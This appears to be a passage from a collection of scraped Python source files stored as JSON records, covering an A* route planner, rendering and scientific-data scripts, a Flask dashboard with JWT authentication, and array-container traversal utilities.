'fox']]\n uni.trainModel(text1)\n\n uni2 = QuadgramModel()\n text = [ ['the', 'brown', 'fox', 'fled','the', 'brown', 'fox'], ['the', 'brown', 'fox'] ]\n uni2.trainModel(text)\n\n print(uni2)\n\n sentence = ['he', 'smelled', 'the', 'brown', 'fox']\n print(uni2.getCandidateDictionary(sentence))\n","sub_path":"creative_ai/models/quadgramModel.py","file_name":"quadgramModel.py","file_ext":"py","file_size_in_byte":4974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"91926439","text":"def shortest_path(M, start, goal):\n print(\"shortest path called\")\n\n frontier = dict([(i,[start]) for i in M.roads[start]]) if start!=goal else {start:[]}\n explored = set([start])\n\n while frontier:\n explore = g_h(M, frontier, goal)\n for i in [i for i in M.roads[explore] if i not in frontier.keys()|explored]:\n frontier[i] = frontier[explore] + [explore]\n frontier = remove_frontier(M, frontier)\n\n if explore == goal:\n return frontier[explore] + [explore]\n\n explored.add(explore)\n del frontier[explore]\n\ndef heuristic(M, a, b):\n M=M.intersections\n return ((M[a][0]-M[b][0])**2+(M[a][1]-M[b][1])**2)**0.5\n\ndef g_h(M, frontier, goal):\n g_h = dict([(path_costs(M, frontier[node] + [node]) + heuristic(M, node, goal), node) for node in frontier])\n return g_h[min(g_h)]\n\ndef path_costs(M, path, cost=0):\n M=M.intersections\n for i in range(len(path) - 1):\n cost += ((M[path[i]][0] - M[path[i+1]][0])**2 + (M[path[i]][1] - M[path[i+1]][1])**2)**0.5\n return cost\n\ndef remove_frontier(M, frontier):\n delete = []\n nodes = list(frontier.keys())\n for node in nodes:\n for i in [i for i in nodes if i != node]:\n if frontier[i] != frontier[node]:\n if i in M.roads[node]:\n if path_costs(M, frontier[node]+[node]+[i]) < path_costs(M, frontier[i]+[i]):\n delete.append(i)\n for i in delete:\n if i in frontier:\n del frontier[i]\n return frontier\n","sub_path":"Project/route_planner_project/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"125202184","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nsimple rendering example with specific background image\n\"\"\"\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\n\nimport neural_renderer as nr\n\n\n# setup render\nimg_size = 256\nrenderer = nr.Renderer(camera_mode='look_at', image_size=img_size)\nrenderer.perspective = True\nrenderer.eye = [0, 0, -2.732]\nrenderer.near = 0.1\nrenderer.far = 100.0\n\n# for brighter visualization\nrenderer.light_intensity_ambient = 1.\nrenderer.light_intensity_ambient = 1\nrenderer.light_intensity_directional = 0\n\n# load obj with default texture image\nverts, faces, textures = nr.load_obj('data/human.obj', load_texture=True)\nverts[:, 1] *= -1.\nverts = verts[None, :, :]\nfaces = faces[None, :, :]\ntextures = textures[None, :, :]\n\nimage_rendered, _, _ = renderer.render(verts, faces, textures)\nimage_1 = (image_rendered[0].cpu().numpy()).transpose((1, 2, 0))\n\n# load obj with other texture\nverts, faces, textures = nr.load_obj('data/human.obj', load_texture=True, texture_image='data/human2.jpg')\nverts[:, 1] *= -1.\nverts = verts[None, :, :]\nfaces = faces[None, :, :]\ntextures = textures[None, :, :]\n\nimage_rendered, _, _ = renderer.render(verts, faces, textures)\nimage_2 = (image_rendered[0].cpu().numpy()).transpose((1, 2, 0))\n\n# render on other background image\nrenderer.background_image = 'data/background.jpg'\nimage_rendered, _, _ = renderer.render(verts, faces, textures)\nimage_3 = (image_rendered[0].cpu().numpy()).transpose((1, 2, 0))\n\n# plot results\nplt.figure()\n\nplt.subplot(131)\nplt.title('default texture')\nplt.imshow(image_1)\nplt.axis('off')\nplt.subplot(132)\nplt.title('specific texture')\nplt.imshow(image_2)\nplt.axis('off')\nplt.subplot(133)\nplt.title('specific background')\nplt.imshow(image_3)\nplt.axis('off')\nplt.draw()\nplt.savefig('data/result_example5.png', dpi=300)\n","sub_path":"examples/example5.py","file_name":"example5.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"255290524","text":"import numpy as np\nfrom datetime import datetime, timedelta\nimport common.tools as ctools\nloc_f10_7 = '/Volumes/Gravity/work/data/sun/OMNIWeb/F10.7/'\nloc_horizons = '/Volumes/Gravity/work/data/exceed/horizons_py/'\n\nimport glob\nfrom MyRc import HskRc\nrc = HskRc()\n\ndef interp(Dt_new, Dt, y):\n if type(Dt_new) is datetime:\n time_new = datetime.timestamp(Dt_new)\n else:\n time_new = np.array([datetime.timestamp(iDt) for iDt in Dt_new])\n time = np.array([datetime.timestamp(iDt) for iDt in Dt])\n y_new = np.interp(time_new, time, y)\n return y_new\n\n\ndef get_f10_7(avg27day=True):\n\n fname = loc_f10_7 + 'omni2_27day_F10.7_1970-2019.txt'\n #fname = loc_f10_7 + 'omni2_daily_F10.7_1970-2020.txt'\n data = np.genfromtxt(fname)\n\n return data\n\n\nclass Horizons():\n def __init__(self, name):\n self.name = name\n path = '/Volumes/Gravity/work/data/exceed/horizons_py/'\n pattern = 'mars_' + str(name) + '.txt'\n self.fname = ctools.file_search(pattern, path)\n self.__get_fileinfo()\n dtype = [('U11'), ('U5'), ('f8'), ('f8'), ('f8'), ('f8'), ('f8'), ('f8'), ('f8'), ('U2'), ('f8')]\n data = np.genfromtxt(self.fname, dtype=dtype,\n skip_header=self.skip_header, skip_footer=self.skip_footer)\n nrow = data.shape[0]\n self.timeDt = np.array([datetime.strptime(data[i][0]+data[i][1], '%Y-%b-%d%H:%M') for i in np.arange(nrow)])\n self.illu = np.array([data[i][2] for i in np.arange(nrow)])\n self.diam = np.array([data[i][3] for i in np.arange(nrow)])\n self.st_dist = np.array([data[i][4] for i in np.arange(nrow)])\n self.et_dist = np.array([data[i][6] for i in np.arange(nrow)])\n self.sot_angle = np.array([data[i][8] for i in np.arange(nrow)])\n self.sot_dir = np.array([data[i][9] for i in np.arange(nrow)])\n self.sto_angle = np.array([data[i][10] for i in np.arange(nrow)])\n\n def __get_fileinfo(self):\n\n if self.name == 'hut':\n self.skip_header = 62\n sfooter = 1480\n efooter = 1585\n nempty = 20\n self.skip_footer = efooter - sfooter + 1 - nempty\n\n if self.name == 'fuse':\n self.skip_header = 62\n sfooter = 1528\n efooter = 1633\n nempty = 20\n self.skip_footer = efooter - sfooter + 1 - nempty\n\n if self.name == 'rosetta':\n self.skip_header = 62\n sfooter = 1480\n efooter = 1585\n nempty = 20\n self.skip_footer = efooter - sfooter + 1 - nempty\n\n## load f10.7 data\ndata = get_f10_7()\nyear = [int(idat) for idat in data[:, 0]]\ndoy = [int(idat) for idat in data[:, 1]]\nf10_7 = data[:, 3]\n\n## set datetimes of hut, fuse, and rosetta observations\ntimeDt = np.array([datetime(iyear, 1, 1) + timedelta(idoy - 1) for iyear, idoy in zip(year, doy)])\nDt_hut = datetime(1995, 3, 12)\nDt_fuse = datetime(2001, 5, 12)\nDt_rosetta = datetime(2007, 2, 25)\nDt_hsk = datetime(2019, 2, 23)\n\nlinename = 'OI1304'\nfname = rc.saveloc + 'mars/npy/calcbr/'+linename+'/'+linename+'_p*.npy'\nfname_list = glob.glob(fname)\ntimeDt_list = []\n\nfor ifname in fname_list:\n idic = np.load(ifname, allow_pickle=True).item()\n timeDt_list.append(idic['timeDt_mean'])\n\n# List to array\ntimeDt_arr = np.array(timeDt_list)\nidx = np.argsort(timeDt_arr)\ntimeDt_arr = timeDt_arr[idx]\n\n## load mars ephemeris data as horizon object\n#hut = Horizons('hut')\n#fuse = Horizons('fuse')\n#rosetta = Horizons('rosetta')\n\nf10_7_hut = interp(Dt_hut, timeDt, f10_7)\nf10_7_fuse = interp(Dt_fuse, timeDt, f10_7)\nf10_7_rosetta = interp(Dt_rosetta, timeDt, f10_7)\nf10_7_hsk = interp(timeDt_arr, timeDt, f10_7)\n\nprint([Dt_hut, Dt_fuse, Dt_rosetta], [f10_7_hut, f10_7_fuse, f10_7_rosetta])\nprint(timeDt_arr, f10_7_hsk)\n","sub_path":"test/test_past_f10_7_at_mars.py","file_name":"test_past_f10_7_at_mars.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"593720731","text":"import datetime\nfrom cip.settings import DEBUG as d\n\ndef create():\n # A variable is defined with local datetime that is replaced '.' instead '/'\n file_name = str(datetime.datetime.now().strftime(\"%x\") + \".txt\").replace('/', '.')\n\n # @return: created file name as string\n return str(file_name)\n\ndef write(text):\n # This is to control debug mode is on or off.\n # Some variables are finally static and constants.\n # They're controlled in one file. They're stored in\n # settings file in all project.\n debug = d\n\n # Retrieves file name\n file_name = create()\n\n # If debug is true, we can create trace files, in other say logs.\n # There are two statements for existing file and non-existing file.\n # Try section is for existing file. Lines in existing log file is read from text,\n # they are written in to new text file with new trace text.\n # Except section is to create new log file.\n # They are finally closed in finally statement for both cases.\n if (debug == True):\n try:\n with open(str(file_name), \"r+\") as log_file:\n lines_in_log_file = log_file.read()\n log_file.seek(0)\n log_file.write(str(text) + \" @ \" + str(datetime.datetime.now()) + \"\\n\" + str(lines_in_log_file))\n except:\n with open(str(file_name), \"a\") as log_file:\n log_file.write(str(text) + \" @ \" + str(datetime.datetime.now()) + \"\\n\")\n finally:\n log_file.close()\n # Otherwise (if debug is false) logging is impossible to write.\n else:\n print(\"Logging is impossible to write.\")\n\n","sub_path":"cip/cip_app/logs.py","file_name":"logs.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"363487018","text":"import flask\nfrom flask import Flask\nimport json\nimport logic\napp = Flask(__name__)\n\n@app.route('/')\ndef dashboard():\n return flask.render_template('dashboard.html')\n\n@app.route('/time_spent/')\ndef time_spent(filteron):\n if filteron == 'Overall':\n filteron = None\n response = logic.time_spent(df, filteron=filteron)\n return json.dumps(response)\n\n@app.route('/progress//')\ndef progress(filteron, user_id):\n if filteron == 'Overall':\n filteron = None\n response = logic.absolute_progress_against_peer_group(df, filteron=filteron, user_id=int(user_id))\n return json.dumps(response)\n\n@app.route('/students')\ndef students():\n return json.dumps(logic.student_list())\n\nif __name__ == '__main__':\n df = logic.load_data()\n app.run(host='0.0.0.0', port=5000, debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"291892152","text":"import flopy\nimport os\nimport shutil\n\n\nproj4 = '+proj=aea +lat_1=27.5 +lat_2=35 +lat_0=31.25 +lon_0=-100 +x_0=1500000 +y_0=6000000 +ellps=GRS80 +towgs84=0,0,0,0,0,0,0 +units=us-ft +no_defs'\n\noffset = 160/2\n\nxul, yul = 5661342.80316535942256451 - offset, 19628009.74438977241516113 + offset\n\n\nmf = flopy.modflow.Modflow('grid')\n\n\nLx, Ly = 8000 + 160, 8000 + 160\n\nnrow, ncol = 51, 51\ndelr, delc = int(Lx/ncol), int(Ly/nrow)\n\n\n\n# nrow, ncol = 50, 50\n# delr, delc = 160, 160\noutputs = os.path.join('outputs')\nif not os.path.exists(outputs): os.mkdir(outputs)\nshapefiles = os.path.join('outputs','shapefiles')\nif not os.path.exists(shapefiles): os.mkdir(shapefiles)\n\ndis = flopy.modflow.ModflowDis(mf,1,nrow,ncol,lenuni=1,delr=delr,delc=delc,xul=xul, yul=yul,proj4_str=proj4)\n# mf.sr = flopy.utils.reference.SpatialReference(prj=os.path.join('gwpath_rasters','starting_location.prj'),delr=delr,delc=delc,yul=yul)\ndis.export(os.path.join(shapefiles,f'grid_offset_{nrow}.shp'))\n\nshutil.copy(os.path.join('texas_gam.prj'),os.path.join(shapefiles,f'grid_offset_{nrow}.prj'))\n","sub_path":"final_form/S01_make_model_grid.py","file_name":"S01_make_model_grid.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"12271504","text":"#! python3\r\n\r\nimport pyautogui\r\nimport time\r\n\r\npyautogui.PAUSE = 2\r\npyautogui.FAILSAFE = True\r\n\r\nprint(\"Press Ctrl-C to quit.\")\r\n\r\ntry:\r\n im = pyautogui.screenshot(region=(1720,330,15,15))\r\n im.save(\"./rerun.png\")\r\n\r\n \r\nexcept KeyboardInterrupt:\r\n print(\"Done\\n\")\r\n","sub_path":"scripts_rerun/screenshot.py","file_name":"screenshot.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"69786680","text":"import sys\nimport os\nimport re\n# print(os.getcwd())\n# sys.stdin=open('practice/uva/5.STL/101-gen.in','r')\ninput = sys.stdin.readline\n\ndef printRes(res):\n for i in range(len(res)):\n tmpres = ' '.join(list(map(str, res[i])))\n print(str(i) + ':' + (tmpres if tmpres == '' else ' ' + tmpres))\n\n\nn = int(input())\nres = [[i] for i in range(n)]\ndef find(x):\n for i in range(len(res)):\n for j in range(len(res[i])):\n if res[i][j] == x:\n return [i, j]\ndef putBack(px, hx):\n for r in res[px][hx+1:]:\n res[r].append(r)\n res[px] = res[px][:hx+1]\ndef pileOver(pa, ha, pb):\n for i in range(ha, len(res[pa])):\n res[pb].append(res[pa][i])\n res[pa] = res[pa][:ha]\n\nwhile True:\n q = input().strip()\n # print(q)\n if q == 'quit':\n printRes(res)\n break\n [cmd1, a, cmd2, b] = q.split(' ')\n\n \n a = int(a)\n b = int(b)\n # print(q, res)\n [pa, ha] = find(a)\n [pb, hb] = find(b)\n if (pa == pb):\n continue\n\n if cmd2 == 'onto':\n putBack(pb, hb)\n if cmd1 == 'move':\n putBack(pa, ha)\n pileOver(pa, ha, pb)\n\n # print(res)\n # print(dic)\n","sub_path":"practice/uva/5.STL/101.py","file_name":"101.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"622503232","text":"import jwt\nimport os\nimport datetime\nfrom flask import json, Response, request, g, make_response\nfrom src.model.UserModel import User\nfrom functools import wraps\nfrom flask import jsonify\n\n\nclass Auth:\n\t\"\"\"\n\tAuth Class\n\t\"\"\"\n\n\t@staticmethod\n\tdef generate_token(user_id):\n\t\t\"\"\"\n\t\tGenerate Token Method\n\t\t:param user_id:\n\t\t:return:\n\t\t\"\"\"\n\t\ttry:\n\t\t\tpayload = {\n\t\t\t\t'exp': datetime.datetime.utcnow() + datetime.timedelta(days=1),\n\t\t\t\t'iat': datetime.datetime.utcnow(),\n\t\t\t\t'public_id': user_id\n\t\t\t}\n\t\t\tprint(os.getenv('JWT_SECRET_KEY'))\n\t\t\ttoken = jwt.encode(\n\t\t\t\tpayload,\n\t\t\t\tos.getenv('JWT_SECRET_KEY'),\n\t\t\t\t'HS256'\n\t\t\t).decode(\"utf-8\")\n\n\t\t\treturn jsonify({'token': token})\n\n\t\texcept Exception:\n\t\t\treturn make_response('Could not generate token', 401, {'WWW-Authenticate': 'Basic realm=\"Login required!\"'})\n\n\t@staticmethod\n\tdef decode_token(token):\n\t\t\"\"\"\n\t\tDecode Token Method\n\t\t:param token:\n\t\t:return:\n\t\t\"\"\"\n\t\tre = {'data': {}, 'error': {}}\n\t\ttry:\n\t\t\tpayload = jwt.decode(token, os.getenv('JWT_SECRET_KEY'))\n\t\t\tre['data'] = {'public_id': payload['public_id']}\n\t\t\treturn re\n\t\texcept jwt.ExpiredSignatureError as e1:\n\t\t\tre['error'] = {'message': 'token expired, please login again'}\n\t\t\treturn re\n\t\texcept jwt.InvalidTokenError:\n\t\t\tre['error'] = {'message': 'Invalid token, please try again with a new token'}\n\t\treturn re\n\n\t# decorator\n\t@staticmethod\n\tdef auth_required(func):\n\t\t\"\"\"\n\t\tAuth decorator\n\t\t\"\"\"\n\n\t\t@wraps(func)\n\t\tdef decorated_auth(*args, **kwargs):\n\t\t\tif 'api-token' not in request.headers:\n\t\t\t\treturn Response(\n\t\t\t\t\tmimetype=\"application/json\",\n\t\t\t\t\tresponse=json.dumps({'error': 'token missing!'}),\n\t\t\t\t\tstatus=400\n\t\t\t\t)\n\t\t\ttoken = request.headers.get('api-token')\n\t\t\tdata = Auth.decode_token(token)\n\n\t\t\tif data['error']:\n\t\t\t\treturn Response(\n\t\t\t\t\tmimetype=\"application/json\",\n\t\t\t\t\tresponse=json.dumps(data['error']),\n\t\t\t\t\tstatus=400\n\t\t\t\t)\n\n\t\t\tpublic_id = data['data']['public_id']\n\t\t\tcheck_user = User.get_one_user(public_id)\n\t\t\tif not check_user:\n\t\t\t\treturn Response(\n\t\t\t\t\tmimetype=\"application/json\",\n\t\t\t\t\tresponse=json.dumps({'error': 'user does not exist, invalid token'}),\n\t\t\t\t\tstatus=400\n\t\t\t\t)\n\t\t\tg.user = {'public_id': public_id}\n\t\t\tcurrent_user = User.query.filter_by(public_id=data['data']['public_id']).first()\n\t\t\treturn func(current_user, *args, **kwargs)\n\n\t\treturn decorated_auth\n","sub_path":"src/shared/Authentication.py","file_name":"Authentication.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"139083411","text":"# mypy: disallow-untyped-defs\n\n\"\"\"\n.. currentmodule:: arraycontext\n\n.. autofunction:: map_array_container\n.. autofunction:: multimap_array_container\n.. autofunction:: rec_map_array_container\n.. autofunction:: rec_multimap_array_container\n\n.. autofunction:: map_reduce_array_container\n.. autofunction:: multimap_reduce_array_container\n.. autofunction:: rec_map_reduce_array_container\n.. autofunction:: rec_multimap_reduce_array_container\n\nTraversing decorators\n~~~~~~~~~~~~~~~~~~~~~\n.. autofunction:: mapped_over_array_containers\n.. autofunction:: multimapped_over_array_containers\n\nFreezing and thawing\n~~~~~~~~~~~~~~~~~~~~\n.. autofunction:: freeze\n.. autofunction:: thaw\n\nNumpy conversion\n~~~~~~~~~~~~~~~~\n.. autofunction:: from_numpy\n.. autofunction:: to_numpy\n\"\"\"\n\n__copyright__ = \"\"\"\nCopyright (C) 2020-1 University of Illinois Board of Trustees\n\"\"\"\n\n__license__ = \"\"\"\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n\"\"\"\n\nfrom typing import Any, Callable, Iterable, List, Optional, Union, Tuple\nfrom functools import update_wrapper, partial, singledispatch\n\nimport numpy as np\n\nfrom arraycontext.context import ArrayContext\nfrom arraycontext.container import (\n ContainerT, ArrayOrContainerT, is_array_container,\n serialize_container, deserialize_container)\n\n\n# {{{ array container traversal helpers\n\ndef _map_array_container_impl(\n f: Callable[[Any], Any],\n ary: ArrayOrContainerT, *,\n leaf_cls: Optional[type] = None,\n recursive: bool = False) -> ArrayOrContainerT:\n \"\"\"Helper for :func:`rec_map_array_container`.\n\n :param leaf_cls: class on which we call *f* directly. This is mostly\n useful in the recursive setting, where it can stop the recursion on\n specific container classes. By default, the recursion is stopped when\n a non-:class:`ArrayContainer` class is encountered.\n \"\"\"\n def rec(_ary: ArrayOrContainerT) -> ArrayOrContainerT:\n if type(_ary) is leaf_cls: # type(ary) is never None\n return f(_ary)\n elif is_array_container(_ary):\n return deserialize_container(_ary, [\n (key, frec(subary)) for key, subary in serialize_container(_ary)\n ])\n else:\n return f(_ary)\n\n frec = rec if recursive else f\n return rec(ary)\n\n\ndef _multimap_array_container_impl(\n f: Callable[..., Any],\n *args: Any,\n reduce_func: Callable[[ContainerT, Iterable[Tuple[Any, Any]]], Any] = None,\n leaf_cls: Optional[type] = None,\n recursive: bool = False) -> ArrayOrContainerT:\n \"\"\"Helper for :func:`rec_multimap_array_container`.\n\n :param leaf_cls: class on which we call *f* directly. This is mostly\n useful in the recursive setting, where it can stop the recursion on\n specific container classes. By default, the recursion is stopped when\n a non-:class:`ArrayContainer` class is encountered.\n \"\"\"\n def rec(*_args: Any) -> Any:\n template_ary = _args[container_indices[0]]\n if (type(template_ary) is leaf_cls\n or not is_array_container(template_ary)):\n return f(*_args)\n\n assert all(\n type(_args[i]) is type(template_ary) for i in container_indices[1:]\n ), f\"expected type '{type(template_ary).__name__}'\"\n\n result = []\n new_args = list(_args)\n\n for subarys in zip(*[\n serialize_container(_args[i]) for i in container_indices\n ]):\n key = None\n for i, (subkey, subary) in zip(container_indices, subarys):\n if key is None:\n key = subkey\n else:\n assert key == subkey\n\n new_args[i] = subary\n\n result.append((key, frec(*new_args))) # type: ignore[operator]\n\n return process_container(template_ary, result) # type: ignore[operator]\n\n container_indices: List[int] = [\n i for i, arg in enumerate(args)\n if is_array_container(arg) and type(arg) is not leaf_cls]\n\n if not container_indices:\n return f(*args)\n\n if len(container_indices) == 1 and reduce_func is None:\n # NOTE: if we just have one ArrayContainer in args, passing it through\n # _map_array_container_impl should be faster\n def wrapper(ary: ArrayOrContainerT) -> ArrayOrContainerT:\n new_args = list(args)\n new_args[container_indices[0]] = ary\n return f(*new_args)\n\n update_wrapper(wrapper, f)\n template_ary: ContainerT = args[container_indices[0]]\n return _map_array_container_impl(\n wrapper, template_ary,\n leaf_cls=leaf_cls, recursive=recursive)\n\n process_container = deserialize_container if reduce_func is None else reduce_func\n frec = rec if recursive else f\n\n return rec(*args)\n\n# }}}\n\n\n# {{{ array container traversal\n\ndef map_array_container(\n f: Callable[[Any], Any],\n ary: ArrayOrContainerT) -> ArrayOrContainerT:\n r\"\"\"Applies *f* to all components of an :class:`ArrayContainer`.\n\n Works similarly to :func:`~pytools.obj_array.obj_array_vectorize`, but\n on arbitrary containers.\n\n For a recursive version, see :func:`rec_map_array_container`.\n\n :param ary: a (potentially nested) structure of :class:`ArrayContainer`\\ s,\n or an instance of a base array type.\n \"\"\"\n try:\n iterable = serialize_container(ary)\n except TypeError:\n return f(ary)\n else:\n return deserialize_container(ary, [\n (key, f(subary)) for key, subary in iterable\n ])\n\n\ndef multimap_array_container(f: Callable[..., Any], *args: Any) -> Any:\n r\"\"\"Applies *f* to the components of multiple :class:`ArrayContainer`\\ s.\n\n Works similarly to :func:`~pytools.obj_array.obj_array_vectorize_n_args`,\n but on arbitrary containers. The containers must all have the same type,\n which will also be the return type.\n\n For a recursive version, see :func:`rec_multimap_array_container`.\n\n :param args: all :class:`ArrayContainer` arguments must be of the same\n type and with the same structure (same number of components, etc.).\n \"\"\"\n return _multimap_array_container_impl(f, *args, recursive=False)\n\n\ndef rec_map_array_container(\n f: Callable[[Any], Any],\n ary: ArrayOrContainerT) -> ArrayOrContainerT:\n r\"\"\"Applies *f* recursively to an :class:`ArrayContainer`.\n\n For a non-recursive version see :func:`map_array_container`.\n\n :param ary: a (potentially nested) structure of :class:`ArrayContainer`\\ s,\n or an instance of a base array type.\n \"\"\"\n return _map_array_container_impl(f, ary, recursive=True)\n\n\ndef mapped_over_array_containers(\n f: Callable[[Any], Any]) -> Callable[[ArrayOrContainerT], ArrayOrContainerT]:\n \"\"\"Decorator around :func:`rec_map_array_container`.\"\"\"\n wrapper = partial(rec_map_array_container, f)\n update_wrapper(wrapper, f)\n return wrapper\n\n\ndef rec_multimap_array_container(f: Callable[..., Any], *args: Any) -> Any:\n r\"\"\"Applies *f* recursively to multiple :class:`ArrayContainer`\\ s.\n\n For a non-recursive version see :func:`multimap_array_container`.\n\n :param args: all :class:`ArrayContainer` arguments must be of the same\n type and with the same structure (same number of components, etc.).\n \"\"\"\n return _multimap_array_container_impl(f, *args, recursive=True)\n\n\ndef multimapped_over_array_containers(\n f: Callable[..., Any]) -> Callable[..., Any]:\n \"\"\"Decorator around :func:`rec_multimap_array_container`.\"\"\"\n # can't use functools.partial, because its result is insufficiently\n # function-y to be used as a method definition.\n def wrapper(*args: Any) -> Any:\n return rec_multimap_array_container(f, *args)\n\n update_wrapper(wrapper, f)\n return wrapper\n\n# }}}\n\n\n# {{{ keyed array container traversal\n\ndef keyed_map_array_container(f: Callable[[Any, Any], Any],\n ary: ArrayOrContainerT) -> ArrayOrContainerT:\n r\"\"\"Applies *f* to all components of an :class:`ArrayContainer`.\n\n Works similarly to :func:`map_array_container`, but *f* also takes an\n identifier of the array in the container *ary*.\n\n For a recursive version, see :func:`rec_keyed_map_array_container`.\n\n :param ary: a (potentially nested) structure of :class:`ArrayContainer`\\ s,\n or an instance of a base array type.\n \"\"\"\n try:\n iterable = serialize_container(ary)\n except TypeError:\n raise ValueError(\n f\"Non-array container type has no key: {type(ary).__name__}\")\n else:\n return deserialize_container(ary, [\n (key, f(key, subary)) for key, subary in iterable\n ])\n\n\ndef rec_keyed_map_array_container(f: Callable[[Tuple[Any, ...], Any], Any],\n ary: ArrayOrContainerT) -> ArrayOrContainerT:\n \"\"\"\n Works similarly to :func:`rec_map_array_container`, except that *f* also\n takes in a traversal path to the leaf array. The traversal path argument is\n passed in as a tuple of identifiers of the arrays traversed before reaching\n the current array.\n \"\"\"\n\n def rec(keys: Tuple[Union[str, int], ...],\n _ary: ArrayOrContainerT) -> ArrayOrContainerT:\n try:\n iterable = serialize_container(_ary)\n except TypeError:\n return f(keys, _ary)\n else:\n return deserialize_container(_ary, [\n (key, rec(keys + (key,), subary)) for key, subary in iterable\n ])\n\n return rec((), ary)\n\n# }}}\n\n\n# {{{ array container reductions\n\ndef map_reduce_array_container(\n reduce_func: Callable[[Iterable[Any]], Any],\n map_func: Callable[[Any], Any],\n ary: ArrayOrContainerT) -> Any:\n \"\"\"Perform a map-reduce over array containers.\n\n :param reduce_func: callable used to reduce over the components of *ary*\n if *ary* is an :class:`~arraycontext.ArrayContainer`. The callable\n should be associative, as for :func:`rec_map_reduce_array_container`.\n :param map_func: callable used to map a single array of type\n :class:`arraycontext.ArrayContext.array_types`. Returns an array of the\n same type or a scalar.\n \"\"\"\n try:\n iterable = serialize_container(ary)\n except TypeError:\n return map_func(ary)\n else:\n return reduce_func([\n map_func(subary) for _, subary in iterable\n ])\n\n\ndef multimap_reduce_array_container(\n reduce_func: Callable[[Iterable[Any]], Any],\n map_func: Callable[..., Any],\n *args: Any) -> Any:\n r\"\"\"Perform a map-reduce over multiple array containers.\n\n :param reduce_func: callable used to reduce over the components of any\n :class:`~arraycontext.ArrayContainer`\\ s in *\\*args*. The callable\n should be associative, as for :func:`rec_map_reduce_array_container`.\n :param map_func: callable used to map a single array of type\n :class:`arraycontext.ArrayContext.array_types`. Returns an array of the\n same type or a scalar.\n \"\"\"\n # NOTE: this wrapper matches the signature of `deserialize_container`\n # to make plugging into `_multimap_array_container_impl` easier\n def _reduce_wrapper(ary: ContainerT, iterable: Iterable[Tuple[Any, Any]]) -> Any:\n return reduce_func([subary for _, subary in iterable])\n\n return _multimap_array_container_impl(\n map_func, *args,\n reduce_func=_reduce_wrapper, leaf_cls=None, recursive=False)\n\n\ndef rec_map_reduce_array_container(\n reduce_func: Callable[[Iterable[Any]], Any],\n map_func: Callable[[Any], Any],\n ary: ArrayOrContainerT) -> Any:\n \"\"\"Perform a map-reduce over array containers recursively.\n\n :param reduce_func: callable used to reduce over the components of *ary*\n (and those of its sub-containers) if *ary* is a\n :class:`~arraycontext.ArrayContainer`. Must be associative.\n :param map_func: callable used to map a single array of type\n :class:`arraycontext.ArrayContext.array_types`. Returns an array of the\n same type or a scalar.\n\n .. note::\n\n The traversal order is unspecified. *reduce_func* must be associative in\n order to guarantee a sensible result. This is because *reduce_func* may be\n called on subsets of the component arrays, and then again (potentially\n multiple times) on the results. As an example, consider a container made up\n of two sub-containers, *subcontainer0* and *subcontainer1*, that each\n contain two component arrays, *array0* and *array1*. The same result must be\n computed whether traversing recursively::\n\n reduce_func([\n reduce_func([\n map_func(subcontainer0.array0),\n map_func(subcontainer0.array1)]),\n reduce_func([\n map_func(subcontainer1.array0),\n map_func(subcontainer1.array1)])])\n\n reducing all of the arrays at once::\n\n reduce_func([\n map_func(subcontainer0.array0),\n map_func(subcontainer0.array1),\n map_func(subcontainer1.array0),\n map_func(subcontainer1.array1)])\n\n or any other such traversal.\n \"\"\"\n def rec(_ary: ArrayOrContainerT) -> ArrayOrContainerT:\n try:\n iterable = serialize_container(_ary)\n except TypeError:\n return map_func(_ary)\n else:\n return reduce_func([\n rec(subary) for _, subary in iterable\n ])\n\n return rec(ary)\n\n\ndef rec_multimap_reduce_array_container(\n reduce_func: Callable[[Iterable[Any]], Any],\n map_func: Callable[..., Any],\n *args: Any) -> Any:\n r\"\"\"Perform a map-reduce over multiple array containers recursively.\n\n :param reduce_func: callable used to reduce over the components of any\n :class:`~arraycontext.ArrayContainer`\\ s in *\\*args* (and those of their\n sub-containers). Must be associative.\n :param map_func: callable used to map a single array of type\n :class:`arraycontext.ArrayContext.array_types`. Returns an array of the\n same type or a scalar.\n\n .. note::\n\n The 